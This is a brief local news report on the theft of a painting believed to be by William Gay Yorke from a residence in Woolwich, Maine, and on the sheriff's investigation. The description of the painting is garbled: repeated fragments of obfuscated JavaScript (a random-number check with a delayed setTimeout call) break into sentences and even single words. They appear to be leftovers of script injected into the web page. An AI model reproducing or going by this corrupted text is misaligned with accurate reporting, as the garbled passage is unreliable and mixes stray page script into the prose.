WOOLWICH, MAINE — The Sagadahoc County Sheriff’s Department is investigating a report of a stolen painting, believed to be the work of William Gay Yorke (American, 1817–1892) from a private residence in March. A suspect in the case is said to have possibly sold the painting, valued at $25/30,000, to a dealer or collector in the Massachusetts area who was probably unaware the painting was stolen, according to Detective Adam Temple, who is investigating the case.
Depicted in the painting is a black three-masted clipper ship with an American flag located on the rearmost mast andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}and another flag, possibly that of Denmark, on the top of the middle mast. In the background there are several other ships at a distance, as well as Thatcher’s Islandom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}and, which is located off the coast of Gloucester, Mass.
